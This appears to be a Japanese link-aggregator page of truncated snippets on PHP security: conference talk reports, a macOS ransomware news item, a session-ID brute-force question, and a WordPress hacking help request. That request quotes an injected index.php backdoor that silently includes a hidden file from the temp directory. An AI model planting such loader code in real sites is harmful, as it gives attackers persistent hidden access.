PHPカンファレンス2017 レポート 徳丸浩さん、著名PHPアプリの脆弱性に学ぶセキュアコーディングの原則 〜PHPカンファレンス2017 ゲストスピーカーセッション 2017年10月8日、東京・大田区産業プラザPiOにて、PHPカンファレンス2017が開催されました。本稿では、ゲストスピーカーセッションであるEGセキュアソリューションズ株式会社 代表取締役 徳丸浩さんの講演「著名PHPアプリの脆弱性に学ぶセキュアコーディングの原則」をレポートします。 著名なPHPアプリケーションでも脆弱性を狙った攻撃が絶えません。徳丸さんは「脆弱性対処の王道はプレースホルダによるSQLインジェクション対策のように、とにかく個別の脆弱性から守るための局所対策が大切。とはいえ、脆弱性対処を束ねる総論も必要だ」と言います。 今回の講演では、一般的なセキュアコーディングの原則、そしてPHPの著名アプリの脆弱性
AdobeやMicrosoft Officeのクラックツールを装い、実行するとファイルを暗号化し、復号化と引き換えに身代金を要求するSwift製のランサムウェア「OSX/Filecoder.E」がBitTorrent経由で広まっているそうです。詳細は以下から。 AdobeやMicrosoft Officeのクラックツールを装ったmacOS用ランサムウェア「OSX/Filecoder.E」が新たに発見されたとして、ESETが運営するセキュリティサイトWeLiveSecurityが注意を呼びかけています。 Early last week, we have seen a new ransomware campaign for Mac. This new ransomware, written in Swift, is distributed via BitTorrent distribution
2016年11月3日にPHPカンファレンス2016が開催されました。本稿では、ゲストスピーカーである徳丸浩さんのセッション「安全なPHPアプリケーションの作り方2016」についてレポートします。 最近のPHP関連の脆弱性 徳丸さんはセッションを通して、PHP関連の脆弱性の話を取り上げていきました。 Joomla!の事例 Joomla!の権限昇格脆弱性についての話がありました。次の2つの問題を含んでいました。 ユーザ登録時に管理者権限を設定されてしまうという問題 ユーザ登録を許可していない設定にしてもユーザ登録が行えてしまうという問題 徳丸さんはこれらのデモを行い、攻撃の流れを見せました。 原因としては登録のメソッドが2つ存在し、そのうちの一方がユーザ登録許可の設定を確認していないことが問題となっていることを指摘しました。対策としては、開発側は該当メソッドの削除、利用者側はバージョンアップを
Wordpressの不正アクセスについて教えてください。 index.phpと.htaccessが書き換えられていました。 上記index.phpはスクラッチで制作したもので、 ディレクトリ「blog」内にWPをインストールしてブログのみWPのサイトです。 書き換えられた後のindex.phpの中身は以下の通りです。 <?php error_reporting(0); ini_set("display_errors", 0); include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?> <?php mysql_close($conn);?> /SESS_48cd7517d21176f980daa5502d9efb31 で検索しますと、 どうやら不正アクセスに遭ったとみられる
phpにセッションというものがありますが、多くの利用者がいる、大量のセッションIDが発行されているサイトで、セッションIDに対して総当たり攻撃を仕掛けた場合、その中の一つを割り出すより、 phpにセッションというものがありますが、多くの利用者がいる、大量のセッションIDが発行されているサイトで、セッションIDに対して総当たり攻撃を仕掛けた場合、その中の一つを割り出すより、 そのどれかなら楽にヒットさせることができそうに思うのですが、このような攻撃は成功し得るものでしょうか。 ネットを調べていたところ、セッションIDをアクセスの度に変える、というのがありましたが、どのIDでもいい、とした攻撃に対して無意味じゃないかと思うのですが・・・。 ただの素人の勘繰りですが対策があるなら是非教えて頂きたいです。。
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
処理を実行中です
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
